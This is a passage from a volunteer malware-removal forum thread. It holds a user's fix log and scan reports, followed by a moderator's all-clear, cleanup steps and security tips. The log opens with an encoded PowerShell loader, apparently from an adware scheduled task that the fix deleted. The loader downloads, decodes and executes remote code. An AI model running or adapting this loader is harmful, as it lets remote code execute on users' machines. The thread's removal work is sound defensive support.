MAEcARgB6AGQAXwBOAHMASQBqADEAbABNAEsAagBzAG0AagBKAG0AUAA1AEYAUQBWAFgATQBnAEsAUgAtAHUARABLAE4AZwAyAE0AbQBJAGIAeAA1AFUAZQBSAGQAMQA0AHYAdABOAEYANgByAFUAdABlAEwAUgBKAEkAeAA0AGcASABSAHMANQAtAEcAZgBxAFMAMwBUAFoAUQBBAEcAZgB5AEYAOAAzADQASgA1AGkAdwA0AG0AYgB4AEgASABmADgAMQB6ADYAUgBOAHkAWQBsAE8AbwBLAFcAdgBlAFcALQBfAF8ASwB5AGUATgBzADYAVwBKAFUARwBMAFUARQBXADQAbgBnAGQAeABXAFgAZwA4ADMAdgBHAHoAVQB1AEkALQBOADgAbgB5AFcANQA2AFYAOAB0AEcAawBkADUASwBZAFkAZQBZAEEAaABIAGUAUgAzAEwAbQAtAHEAYQBpADgAdwBMAGgAeABlAHAAVABiAEcAawBBADUAagB3ADcAOQBuAEkANAByAG4AcgA2AHkAVABrAHEAZAA4AFUAVQBsAGwANQBKAHIAeQBUAHMATQA1AFIAUABtAHMAeABXAF8ANQBVAHQAaQBHAG4ATwB5AFkAVgBHAHoAeQB2AEkAMwB1AEIARwBQAGIASQAxAGQAQQBiAHgAbgBnAHoAQwBRAFgAMgBoAGwAagBlAHEAbwB6AEkAUQBRADcAZgAyAHUAXwBQAGkAdABEADQAaQA5AEMAegBiAE8AJgByAD0AMwAzADEAMQA3ADAANQAyADMAOAA3ADAAOQA2ADUANwA3ADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcARQAwAEIAMABFADQANwAtADAARgA3ADkALQAwADgAMAA4AC0AMABCADEAMQAtADAAQwAwAEMAMABBADcARgAxADEAMABDAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBTAEoATABLAEwATQBNAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
CMD: ipconfig /flushdns
EmptyTemp:
end
*****************
 
Restore point was successfully created.
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
Chrome RestoreOnStartup => removed successfully
Chrome StartupUrls => removed successfully
Chrome DefaultSearchURL => not found.
Chrome DefaultSearchKeyword => not found.
Chrome DefaultNewTabURL => not found.
OPR StartupUrls: "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU" => removed successfully
"C:\ProgramData\54070cb8-2431-0" => not found.
"C:\ProgramData\54070cb8-6861-0" => not found.
"C:\ProgramData\{2b04c619-412c-1}" => not found.
"C:\ProgramData\{08be3c40-312c-0}" => not found.
"C:\ProgramData\b3eda95e-7691-0" => not found.
"C:\ProgramData\b3eda95e-5667-1" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954}" => key removed successfully
C:\WINDOWS\System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C}" => key removed successfully
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 1.2 GB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 17:13:45 ====
 
 
MALWAREBYTES
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 2/24/2016
Scan Time: 5:29 PM
Logfile: 
Administrator: Yes
 
Version: 2.2.0.1024
Malware Database: v2016.02.24.09
Rootkit Database: v2016.02.17.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: Jonathan
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 360265
Time Elapsed: 29 min, 15 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
 
ESET.txt
 
C:\Users\Jonathan\AppData\Local\Microsoft\Windows\INetCache\IE\3A736GTL\WeatherBugSetup[1].exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application
 

Edited by JonKaz, 24 February 2016 - 08:05 PM.

  • 0

#8
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hello,
 

AdwCleaner[C1].txt was copied but not saved. Computer rebooted after FRST run and AdwCleaner now says "nothing found" so no .txt file was created.

OK, no problem. That's fine. 
 
Did you run ESET Online Scan?


  • 0

#9
JonKaz

JonKaz

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts
Yes.
 
ESET.txt
 
C:\Users\Jonathan\AppData\Local\Microsoft\Windows\INetCache\IE\3A736GTL\WeatherBugSetup[1].exe a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application

  • 0

#10
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hello, 

 

Are you still experiencing the issues described in your first post?


  • 0

#11
JonKaz

JonKaz

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

No. It looks like it worked! Everything is running well. Thank you very much for the help.


  • 0

#12
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hi Jonathan, 
 

No. It looks like it worked! Everything is running well. Thank you very much for the help.

You're welcome. :)
 
All Clean!
Congratulations, your computer appears clean! smile.png
I see no signs of malware on your computer, and feel satisfied our work here is done. The steps below will remove the tools we have used, and reset any settings changed. I have also provided a list of resources and tools that you may find useful. 
 
AFZxnZc.jpg DelFix

  • Please download DelFix and save the file to your Desktop.
  • Double-click DelFix.exe to run the programme.
  • Place a checkmark next to the following items:
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore (creates a Restore Point/removes all but the most recent)
    • Reset system settings
  • Click the Run button.

-- DelFix will remove the specialised tools we used to clean your computer. Any leftover logs, files, folders or tools remaining on your computer which were not removed can be deleted manually (right-click the file + delete).
 
--- Malwarebytes Anti-Malware will still be present on your computer. I recommend keeping this programme, updating and scanning with it once a week to maintain security on your computer. If you do not wish to keep this programme installed, you can uninstall it by pressing the Windows Key pdKOQKY.png + r on your keyboard at the same time, typing appwiz.cpl, clicking OK and searching for Malwarebytes.
 
======================================================
 
I have compiled below a list of resources you may find useful. The articles document information on computer security, common attack vectors and how you can stay safe on the Internet.

The following programmes come highly recommended in the security community.

  • KsUqI5A.png AdBlock is a browser add-on that blocks annoying banners, pop-ups and video ads.
  • E8I37RF.pngCryptoPrevent places policy restrictions on loading points for ransomware (eg. CryptoWall), helping prevent the execution of malware. 
  • EG85Vjt.png Malwarebytes Anti-Exploit (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
  • 6YRrgUC.png Malwarebytes Anti-Malware Premium (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
  • jv4nhMJ.png NoScript is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology. 
  • 3O8r9Uq.png Sandboxie isolates programmes of your choice, preventing files from being written to your HDD unless approved by you. 
  • DgW1XL2.png Secunia PSI will scan your computer for vulnerable software that is outdatedand automatically find the latest update for you.
  • j1OLIec.png SpywareBlaster is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
  • sHjS79L.png Unchecky automatically removes checkmarks for bunlded software in programme installers; helping you avoid adware and PUPs. 
  • JEP5iWI.png Web of Trust (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website. 
     

Need a second opinion on a file or website? Scan the file/URL before clicking by using one of the following free online scanner services.

-- Please feel free to ask if you have any questions or concerns on computer security or the programmes above.
 
======================================================
 
Please confirm you have no outstanding issues, and feel happy with the state of your computer. Once I have confirmation, we can wrap things up and I will close this topic. 
 
Thank you for using Geeks to Go.
 
Safe Surfing. thumbup.gif
Adam


  • 0

#13
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Since this issue appears to be resolved ... this Topic has been closed. Glad we could help. :)

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a New Topic.


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP